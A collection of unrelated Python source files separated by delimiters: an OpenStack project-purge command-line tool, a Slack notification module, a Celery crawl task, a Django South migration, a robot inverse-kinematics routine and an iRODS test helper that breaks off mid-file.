self.client.delete_pool(pool['id'])
@staticmethod
def resource_str(pool):
return "lb-pool {} (id {})".format(pool['name'], pool['id'])
class NeutronLbVip(NeutronResources):
def list(self):
return filter(self._owned_resource, self.client.list_vips(
tenant_id=self.project_id)['vips'])
def delete(self, vip):
super(NeutronLbVip, self).delete(vip)
self.client.delete_vip(vip['id'])
@staticmethod
def resource_str(vip):
return "lb-vip {} (id {})".format(vip['name'], vip['id'])
class NeutronLbHealthMonitor(NeutronResources):
def list(self):
return filter(self._owned_resource, self.client.list_health_monitors(
tenant_id=self.project_id)['health_monitors'])
def delete(self, health_monitor):
super(NeutronLbHealthMonitor, self).delete(health_monitor)
self.client.delete_health_monitor(health_monitor['id'])
@staticmethod
def resource_str(health_monitor):
return "lb-health_monotor type {} (id {})".format(
health_monitor['type'], health_monitor['id'])
class NeutronMeteringLabel(NeutronResources):
def list(self):
return filter(self._owned_resource, self.client.list_metering_labels(
tenant_id=self.project_id)['metering_labels'])
def delete(self, metering_label):
super(NeutronMeteringLabel, self).delete(metering_label)
self.client.delete_metering_label(metering_label['id'])
@staticmethod
def resource_str(metering_label):
return "meter-label {} (id {})".format(
metering_label['name'], metering_label['id'])
class NeutronFireWallPolicy(NeutronResources):
def list(self):
return filter(self._owned_resource, self.client.list_firewall_policies(
tenant_id=self.project_id)['firewall_policies'])
def delete(self, firewall_policy):
super(NeutronFireWallPolicy, self).delete(firewall_policy)
self.client.delete_firewall_policy(firewall_policy['id'])
@staticmethod
def resource_str(firewall_policy):
return "Firewall policy {} (id {})".format(
firewall_policy['name'], firewall_policy['id'])
class NeutronFireWallRule(NeutronResources):
def list(self):
return filter(self._owned_resource, self.client.list_firewall_rules(
tenant_id=self.project_id)['firewall_rules'])
def delete(self, firewall_rule):
super(NeutronFireWallRule, self).delete(firewall_rule)
self.client.delete_firewall_rule(firewall_rule['id'])
@staticmethod
def resource_str(firewall_rule):
return "Firewall rule {} (id {})".format(
firewall_rule['name'], firewall_rule['id'])
class NeutronFireWall(NeutronResources):
def list(self):
return filter(self._owned_resource, self.client.list_firewalls(
tenant_id=self.project_id)['firewalls'])
def delete(self, firewall):
super(NeutronFireWall, self).delete(firewall)
self.client.delete_firewall(firewall['id'])
@staticmethod
def resource_str(firewall):
return "Firewall {} (id {})".format(firewall['name'], firewall['id'])
class NovaServers(Resources):
def __init__(self, session):
super(NovaServers, self).__init__(session)
self.client = nova_client.Client(
session.username, session.password,
session.project_name, auth_url=session.auth_url,
endpoint_type=session.endpoint_type,
region_name=session.region_name, insecure=session.insecure)
self.project_id = session.project_id
"""Manage nova resources"""
def list(self):
return self.client.servers.list()
def delete(self, server):
super(NovaServers, self).delete(server)
self.client.servers.delete(server)
def resource_str(self, server):
return "server {} (id {})".format(server.name, server.id)
class GlanceImages(Resources):
def __init__(self, session):
self.client = glance_client.Client(
endpoint=session.get_endpoint("image"),
token=session.token, insecure=session.insecure)
self.project_id = session.project_id
def list(self):
return filter(self._owned_resource, self.client.images.list(
owner=self.project_id))
def delete(self, image):
super(GlanceImages, self).delete(image)
self.client.images.delete(image.id)
def resource_str(self, image):
return "image {} (id {})".format(image.name, image.id)
def _owned_resource(self, res):
# Only considering resources owned by project
return res.owner == self.project_id
class HeatStacks(Resources):
def __init__(self, session):
self.client = heat_client.Client(
"1",
endpoint=session.get_endpoint("orchestration"),
token=session.token, insecure=session.insecure)
self.project_id = session.project_id
def list(self):
return self.client.stacks.list()
def delete(self, stack):
super(HeatStacks, self).delete(stack)
if stack.stack_status == "DELETE_FAILED":
self.client.stacks.abandon(stack.id)
else:
self.client.stacks.delete(stack.id)
def resource_str(self, stack):
return "stack {})".format(stack.id)
class CeilometerAlarms(Resources):
def __init__(self, session):
# Ceilometer Client needs a method that returns the token
def get_token():
return session.token
self.client = ceilometer_client.Client(
auth_url=session.auth_url,
endpoint=session.get_endpoint("metering"),
token=get_token, insecure=session.insecure)
self.project_id = session.project_id
def list(self):
query = [{'field': 'project_id',
'op': 'eq',
'value': self.project_id}]
return self.client.alarms.list(q=query)
def delete(self, alarm):
super(CeilometerAlarms, self).delete(alarm)
self.client.alarms.delete(alarm.alarm_id)
def resource_str(self, alarm):
return "alarm {}".format(alarm.name)
class KeystoneManager(object):
"""Manages Keystone queries."""
def __init__(self, username, password, project, auth_url, insecure, **kwargs):
self.client = keystone_client.Client(
username=username, password=password,
tenant_name=project, auth_url=auth_url,
insecure=insecure, **kwargs)
self.admin_role_id = None
self.tenant_info = None
def get_project_id(self, project_name_or_id=None):
"""Get a project by its id
Returns:
* ID of current project if called without parameter,
* ID of project given as parameter if one is given.
"""
if project_name_or_id is None:
return self.client.tenant_id
try:
self.tenant_info = self.client.tenants.get(project_name_or_id)
# If it doesn't raise an 404, project_name_or_id is
# already the project's id
project_id = project_name_or_id
except api_exceptions.NotFound:
try:
# Can raise api_exceptions.Forbidden:
tenants = self.client.tenants.list()
project_id = filter(
lambda x: x.name == project_name_or_id, tenants)[0].id
except IndexError:
raise NoSuchProject(project_name_or_id)
if not self.tenant_info:
self.tenant_info = self.client.tenants.get(project_id)
return project_id
def enable_project(self, project_id):
logging.info("* Enabling project {}.".format(project_id))
self.tenant_info = self.client.tenants.update(project_id, enabled=True)
def disable_project(self, project_id):
logging.info("* Disabling project {}.".format(project_id))
self.tenant_info = self.client.tenants.update(project_id, enabled=False)
def get_admin_role_id(self):
if not self.admin_role_id:
roles = self.client.roles.list()
self.admin_role_id = filter(lambda x: x.name == "admin", roles)[0].id
return self.admin_role_id
def become_project_admin(self, project_id):
user_id = self.client.user_id
admin_role_id = self.get_admin_role_id()
logging.info("* Granting role admin to user {} on project {}.".format(
user_id, project_id))
return self.client.roles.add_user_role(user_id, admin_role_id, project_id)
def undo_become_project_admin(self, project_id):
user_id = self.client.user_id
admin_role_id = self.get_admin_role_id()
logging.info("* Removing role admin to user {} on project {}.".format(
user_id, project_id))
return self.client.roles.remove_user_role(user_id, admin_role_id, project_id)
def delete_project(self, project_id):
logging.info("* Deleting project {}.".format(project_id))
self.client.tenants.delete(project_id)
def perform_on_project(admin_name, password, project, auth_url,
endpoint_type='publicURL', region_name=None,
action='dump', insecure=False):
"""Perform provided action on all resources of project.
action can be: 'purge' or 'dump'
"""
session = Session(admin_name, password, project, auth_url,
endpoint_type, region_name, insecure)
error = None
for rc in RESOURCES_CLASSES:
try:
resources = globals()[rc](session)
res_actions = {'purge': resources.purge,
'dump': resources.dump}
res_actions[action]()
except (EndpointNotFound,
keystoneclient.openstack.common.apiclient.exceptions.EndpointNotFound,
neutronclient.common.exceptions.EndpointNotFound,
cinderclient.exceptions.EndpointNotFound,
novaclient.exceptions.EndpointNotFound,
heatclient.openstack.common.apiclient.exceptions.EndpointNotFound,
ResourceNotEnabled):
# If service is not in Keystone's services catalog, ignoring it
pass
except requests.exceptions.MissingSchema as e:
logging.warning(
'Some resources may not have been deleted, "{!s}" is '
'improperly configured and returned: {!r}\n'.format(rc, e))
except (ceilometerclient.exc.InvalidEndpoint, glanceclient.exc.InvalidEndpoint) as e:
logging.warning(
"Unable to connect to {} endpoint : {}".format(rc, e.message))
error = InvalidEndpoint(rc)
except (neutronclient.common.exceptions.NeutronClientException):
# If service is not configured, ignoring it
pass
if error:
raise error
class EnvDefault(argparse.Action):
def __init__(self, envvar, required=True, default=None, **kwargs):
# Overriding default with environment variable if available
if envvar in os.environ:
default = os.environ[envvar]
if required and default:
required = False
super(EnvDefault, self).__init__(default=default, required=required,
**kwargs)
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, values)
def parse_args():
desc = "Purge resources from an Openstack project."
parser = argparse.ArgumentParser(description=desc)
parser.add_argument("--verbose", action="store_true",
help="Makes output verbose")
parser.add_argument("--dry-run", action="store_true",
help="List project's resources")
parser.add_argument("--dont-delete-project", action="store_true",
help="Executes cleanup script without removing the project. "
"Warning: all project resources will still be deleted.")
parser.add_argument("--region-name", action=EnvDefault, required=False,
envvar='OS_REGION_NAME', default=None,
help="Region to use. Defaults to env[OS_REGION_NAME] "
"or None")
parser.add_argument("--endpoint-type", action=EnvDefault,
envvar='OS_ENDPOINT_TYPE', default="publicURL",
help="Endpoint type to use. Defaults to "
"env[OS_ENDPOINT_TYPE] or publicURL")
parser.add_argument("--username", action=EnvDefault,
envvar='OS_USERNAME', required=True,
help="If --own-project is set : a user name with access to the "
"project being purged. If --cleanup-project is set : "
"a user name with admin role in project specified in --admin-project. "
"Defaults to env[OS_USERNAME]")
parser.add_argument("--password", action=EnvDefault,
envvar='OS_PASSWORD', required=True,
help="The user's password. Defaults "
"to env[OS_PASSWORD].")
parser.add_argument("--admin-project", action=EnvDefault,
envvar='OS_TENANT_NAME', required=True,
help="Project name used for authentication. This project "
"will be purged if --own-project is set. "
"Defaults to env[OS_TENANT_NAME].")
parser.add_argument("--auth-url", action=EnvDefault,
envvar='OS_AUTH_URL', required=True,
help="Authentication URL. Defaults to "
"env[OS_AUTH_URL].")
parser.add_argument("--cleanup-project", required=False, default=None,
help="ID or Name of project to purge. Not required "
"if --own-project has been set. Using --cleanup-project "
"requires to authenticate with admin credentials.")
parser.add_argument("--own-project", action="store_true",
help="Delete resources of the project used to "
"authenticate. Useful if you don't have the "
"admin credentials of the platform.")
parser.add_argument("--insecure", action="store_true",
help="Explicitly allow all OpenStack clients to perform "
"insecure SSL (https) requests. The server's "
"certificate will not be verified against any "
"certificate authorities. This option should be "
"used with caution.")
args = parser.parse_args()
if not (args.cleanup_project or args.own_project):
parser.error('Either --cleanup-project '
'or --own-project has to be set')
if args.cleanup_project and args.own_project:
parser.error('Both --cleanup-project '
'and --own-project can not be set')
return args
def main():
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.INFO)
else:
# Set default log level to Warning
logging.basicConfig(level=logging.WARNING)
try:
keystone_manager = KeystoneManager(args.username, args.password,
args.admin_project, args.auth_url,
args.insecure, region_name=args.region_name)
except api_exceptions.Unauthorized as exc:
print("Authentication failed: {}".format(str(exc)))
sys.exit(AUTHENTICATION_FAILED_ERROR_CODE)
remove_admin_role_after_purge = False
disable_project_after_purge = False
try:
cleanup_project_id = keystone_manager.get_project_id(
args.cleanup_project)
if not args.own_project:
try:
keystone_manager.become_project_admin(cleanup_project_id)
except api_exceptions.Conflict:
# user was already admin on the target project.
pass
else:
remove_admin_role_after_purge = True
# If the project was enabled before the purge, do not disable it after the purge
disable_project_after_purge = not keystone_manager.tenant_info.enabled
if disable_project_after_purge:
# The project is currently disabled so we need to enable it
# in order to delete resources of the project
keystone_manager.enable_project(cleanup_project_id)
except api_exceptions.Forbidden as exc:
print("Not authorized: {}".format(str(exc)))
sys.exit(NOT_AUTHORIZED)
except NoSuchProject as exc:
print("Project {} doesn't exist".format(str(exc)))
sys.exit(NoSuchProject.ERROR_CODE)
# Proper cleanup
try:
action = "dump" if args.dry_run else "purge"
perform_on_project(args.username, args.password, cleanup_project_id,
args.auth_url, args.endpoint_type, args.region_name,
action, args.insecure)
except requests.exceptions.ConnectionError as exc:
print("Connection error: {}".format(str(exc)))
sys.exit(CONNECTION_ERROR_CODE)
except (DeletionFailed, InvalidEndpoint) as exc:
print("Deletion of {} failed".format(str(exc)))
print("*Warning* Some resources may not have been cleaned up")
sys.exit(DeletionFailed.ERROR_CODE)
if (not args.dry_run) and (not args.dont_delete_project) and (not args.own_project):
keystone_manager.delete_project(cleanup_project_id)
else:
# Project is not deleted, we may want to disable the project
# this must happen before we remove the admin role
if disable_project_after_purge:
keystone_manager.disable_project(cleanup_project_id)
# We may also want to remove ourself from the purged project
if remove_admin_role_after_purge:
keystone_manager.undo_become_project_admin(cleanup_project_id)
sys.exit(0)
if __name__ == "__main__":
main()
|
from typing import List, Dict, Optional, Any
import aiohttp
import json
import jinja2
from irisett import (
log
)
async def send_slack_notification(url: str, attachments: List[Dict]):
data = {
'attachments': attachments
}
try:
async with aiohttp.ClientSession() as session:
async with session.post(url, data=json.dumps(data), timeout=30) as resp:
if resp.status != 200:
log.msg('Error sending slack notification: http status %s' % (str(resp.status)),
'NOTIFICATION')
except aiohttp.ClientError as e:
log.msg('Error sending slack notification: %s' % (str(e)), 'NOTIFICATIONS')
async def send_alert_notification(settings: Dict, tmpl_args: Dict):
attachment = {
'fallback': settings['tmpl-msg'].render(**tmpl_args),
'fields': [],
}
attachment['pretext'] = attachment['fallback']
if settings['tmpl-duration']:
attachment['fields'].append({
'title': 'Duration',
'value': settings['tmpl-duration'].render(**tmpl_args),
'short': False,
})
if settings['tmpl-url']:
attachment['fields'].append({
'title': 'URL',
'value': settings['tmpl-url'].render(**tmpl_args),
'short': False,
})
await send_slack_notification(settings['webhook-url'], [attachment])
def parse_settings(config: Any) -> Optional[Dict[str, Any]]:
ret = {
'webhook-url': config.get('slack-webhook-url'),
'tmpl-msg': config.get('slack-tmpl-msg'),
'tmpl-duration': config.get('slack-tmpl-duration', fallback=''),
'tmpl-url': config.get('slack-tmpl-url', fallback='')
} # type: Any
if not ret['webhook-url'] or not ret['tmpl-msg']:
log.debug('Slack settings missing, no slack notifications will be sent', 'NOTIFICATIONS')
ret = None
else:
log.debug('Valid slack notification settings found', 'NOTIFICATIONS')
ret['tmpl-msg'] = jinja2.Template(ret['tmpl-msg'])
if ret['tmpl-duration']:
ret['tmpl-duration'] = jinja2.Template(ret['tmpl-duration'])
if ret['tmpl-url']:
ret['tmpl-url'] = jinja2.Template(ret['tmpl-url'])
return ret
|
from celery.schedules import crontab
from celery.task import periodic_task
from celery.utils.log import get_task_logger
from Crawler.utils import run_crawler
logger = get_task_logger(__name__)
__author__ = 'nolram'
@periodic_task(
run_every=(crontab(minute='*/15')),
name="crawling_news_rss",
ignore_result=True
)
def do_crawling():
run_crawler()
logger.info("Crawling News Concluido")
|
raise NotImplementedError("command is not yet implemented in Skulpt")
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Event.last_update'
db.add_column('multilingual_events_event', 'last_update',
self.gf('django.db.models.fields.DateTimeField')(auto_now=True, default=datetime.datetime(2013, 2, 25, 0, 0), blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Event.last_update'
db.delete_column('multilingual_events_event', 'last_update')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 25, 0, 0)'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'document_library.document': {
'Meta': {'ordering': "('position', '-creation_date')", 'object_name': 'Document'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['document_library.DocumentCategory']", 'null': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'download_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_on_front_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'position': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'document_library.documentcategory': {
'Meta': {'object_name': 'DocumentCategory'},
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '32'})
},
'multilingual_events.event': {
'Meta': {'ordering': "('start_date',)", 'object_name': 'Event'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['multilingual_events.EventCategory']"}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'end_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'placeholders': ('djangocms_utils.fields.M2MPlaceholderField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
'start_date': ('django.db.models.fields.DateField', [], {}),
'start_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'timezone': ('django.db.models.fields.CharField', [], {'max_length': '65', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'url_name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'multilingual_events.eventagendaday': {
'Meta': {'object_name': 'EventAgendaDay', 'db_table': "'cmsplugin_eventagendaday'", '_ormbases': ['cms.CMSPlugin']},
'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'multilingual_events.eventagendasession': {
'Meta': {'object_name': 'EventAgendaSession', 'db_table': "'cmsplugin_eventagendasession'", '_ormbases': ['cms.CMSPlugin']},
'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '4000', 'blank': 'True'}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['document_library.Document']", 'null': 'True', 'blank': 'True'}),
'end_time': ('django.db.models.fields.DateTimeField', [], {}),
'start_time': ('django.db.models.fields.DateTimeField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'multilingual_events.eventagendatalk': {
'Meta': {'object_name': 'EventAgendaTalk', 'db_table': "'cmsplugin_eventagendatalk'", '_ormbases': ['cms.CMSPlugin']},
'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '4000', 'blank': 'True'}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['document_library.Document']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'multilingual_events.eventcategory': {
'Meta': {'object_name': 'EventCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'position': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'multilingual_events.eventcategorytitle': {
'Meta': {'object_name': 'EventCategoryTitle'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['multilingual_events.EventCategory']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'multilingual_events.eventtitle': {
'Meta': {'object_name': 'EventTitle'},
'address': ('django.db.models.fields.TextField', [], {'max_length': '2000', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['multilingual_events.Event']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'room': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '512'})
}
}
complete_apps = ['multilingual_events']
|
import numpy as np
def robotBoschikt(robot, pos):
"""
Inverse kinematic task for robot Bosch.
:param robot: Robot Bosch instance.
:param pos: Coordinates of robot position in world coordinates.
:return: Coordinates of robot position in joint coordinates (degrees).
"""
pos = np.array(pos).astype(float)
c = np.sqrt(pos[0] ** 2 + pos[1] ** 2)
v = (c ** 2 - robot.L1 ** 2 - robot.L2 ** 2) / (2 * robot.L1 * robot.L2)
if abs(v) > 1.0:
return []
b = np.arccos(v) * 180.0 / np.pi
g = np.arccos((c ** 2 + robot.L1 ** 2 - robot.L2 ** 2) / (2 * robot.L1 * c)) * 180.0 / np.pi
if pos[0] == 0:
d = 90.0 * np.sign(pos[1])
else:
d = np.arctan(pos[1] / pos[0]) * np.sign(pos[0]) * 180.0 / np.pi
deg = np.empty((2,4))
deg[0, 3] = pos[3]
deg[0, 2] = -pos[2]
deg[0, 1] = b
deg[0, 0] = 90.0 - d - g
deg[1, 3] = pos[3]
deg[1, 2] = -pos[2]
deg[1, 1] = -b
deg[1, 0] = 90.0 - d + g
if pos[0] != 0:
deg[:, :2] = deg[:, :2] * np.sign(pos[0])
if pos[0] < 0:
p = deg[0, :]
deg[0, :] = deg[1, :]
deg[1, :] = p
return deg
|
import atexit
import logging
import os
import platform
import subprocess
from enum import Enum, unique
from tempfile import mkdtemp
import re
import shutil
from typing import List, Union, Dict, Set
from uuid import uuid4
from useintest.modules.irods.models import IrodsResource, IrodsUser, Version
@unique
class AccessLevel(Enum):
"""
Entity access levels available in iRODS.
"""
NONE = "null"
READ = "read"
WRITE = "write"
OWN = "own"
class IrodsSetupHelper:
"""
Helper for setting up tests using iRODS.
"""
def __init__(self, icommands_location: str):
"""
Constructor.
:param icommands_location: the location of the icommands that can be used to communicate with the iRODS server
"""
self.icommands_location = icommands_location
def create_data_object(self, name: str, contents: str="") -> str:
"""
Creates a test data object on iRODS with the given name and contents.
:param name: the nane of the file to create
:param contents: the contents of the file to create
:return: the path to the created file
"""
if "/" in name:
raise ValueError("Data object name cannot include '/'")
# TODO: Consider using `TempManager` from `hgicommon` instead
def remove_temp_folder(location: str):
if os.path.exists(location):
try:
shutil.rmtree(location)
except OSError:
pass
temp_root = None
if platform.system() == "Darwin":
# The temp directory on a Mac machine is somewhere that cannot be bind mounted by Docker using default
# settings. /tmp can however
temp_root = "/tmp"
temp_directory_path = mkdtemp(dir=temp_root)
atexit.register(remove_temp_folder, temp_directory_path)
temp_file_path = os.path.join(temp_directory_path, name)
os.chmod(temp_directory_path, 0o770)
with open(temp_file_path, "w+") as temp_file:
temp_file.write(contents)
os.chmod(temp_file_path, 0o770)
self.run_icommand(["iput", temp_file_path])
remove_temp_folder(temp_directory_path)
atexit.unregister(remove_temp_folder)
return "%s/%s" % (self.run_icommand(["ipwd"]), name)
def read_data_object(self, path: str) -> str:
"""
Reads the contents of the entity with the given path.
:param path: the path to the entity in iRODS
:return: the entity's contents
"""
return self.run_icommand(["iget", path, "-"])
def replicate_data_object(self, path: str, replicate_to: Union[str, IrodsResource]):
"""
Replicates the data object in the given path to the given resource.
:param path: the path of the data object that is to be replicated
:param replicate_to: the resource or name of the resource to which the data object should be replicated to
"""
if isinstance(replicate_to, IrodsResource):
replicate_to = replicate_to.name
self.run_icommand(["irepl", "-R", replicate_to, path])
def create_collection(self, name: str) -> str:
"""
Creates a test collection on iRODS with the given name and contents.
:param name: the name of the collection to create
:return: the path to the created collection
"""
if "/" in name:
raise ValueError("Collection name cannot include '/'")
self.run_icommand(["imkdir", name])
return "%s/%s" % (self.run_icommand(["ipwd"]), name)
def add_metadata_to(self, path: str, metadata: Dict):
"""
Adds the given metadata to the entity at the given path in iRODS.
:param path: the path to add metadata to (could correspond to a collection or data object)
:param metadata: the metadata to add
"""
if len(metadata) > 0:
type_flag = "-c" if self.is_collection(path) else "-d"
for key, values in metadata.items():
if not isinstance(values, List) and not isinstance(values, Set):
values = [values]
assert type(values) != str
for value in values:
self.run_icommand(["imeta", "add", type_flag, path, key, str(value)])
def is_collection(self, path: str) -> bool:
"""
Checks whether the given path in iRODS is a collection.
:param path: the path to check
:return: whether there is a collection at the given path
"""
listing = self.run_icommand(["ils", path])
return ":" in listing
def update_checksums(self, path: str):
"""
Forces iRODS to update the checksums of all replicas of the data object with the path given/all data objects
in the collection given (recursive).
:param path: the path to the data object/collection
"""
self.run_icommand(["ichksum", "-f", "-a", "-r", path])
def get_checksum(self, path: str) -> str:
"""
Gets the checksum of the most recently updated replica of a data object on iRODS.
If not stored in iRODS, the checksum will be calculated and stored as an unavoidable side-effect.
:param path: the path to the data object
:return: the checksum of the data object
"""
checksum_out = self.run_icommand(["ichksum", path])
return checksum_out.split('\n')[0].rsplit(' ', 1)[-1]
def create_replica_storage(self) -> IrodsResource:
"""
Creates replica storage resource.
:return: resource on which replicas can be stored
"""
name = str(uuid4())
location = "/tmp/%s" % name
host = "localhost"
if self.get_icat_version().major == 3:
self.run_icommand(
["iadmin", "mkresc", "%s" % name, "unix file system", "cache", "%s" % host, "%s" % location])
else:
self.run_icommand(["iadmin", "mkresc", "%s" % name, "unixfilesystem", "%s:%s" % (host, location)])
return IrodsResource(name, host, location)
def create_user(self, username: str, zone: str) -> IrodsUser:
"""
Creates a user with a given username in the given zone.
:param username: the username the user should have
:param zone: the zone the user should be in
:return: the created user
"""
user = IrodsUser(username, zone, None)
try:
self.run_icommand(["iadmin", "mkuser", "%s#%s" % (username, zone), "rodsuser"])
except RuntimeError as e:
if "CATALOG_ALREADY_HAS_ITEM_BY_THAT_NAME" in e.args[0]:
raise ValueError("A user already exists with the given username")
return user
def set_access(self, user_or_group: str, level: AccessLevel, path: str):
"""
Sets the given access level for a user or group on the entity at the given path in iRODS.
:param user_or_group: the user or group which the access level is been set for
:param level: the access level
:param path: the path of the entity
"""
self.run_icommand(["ichmod", level.value, user_or_group, path])
def get_icat_version(self) -> Version:
"""
Gets the version of iCAT server being used.
